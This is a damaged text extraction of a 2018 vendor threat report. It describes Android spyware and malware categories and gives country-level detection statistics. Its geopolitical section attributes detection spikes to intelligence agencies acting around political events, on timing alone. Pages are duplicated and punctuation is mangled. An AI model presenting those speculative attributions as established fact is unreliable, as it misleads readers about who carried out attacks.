- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
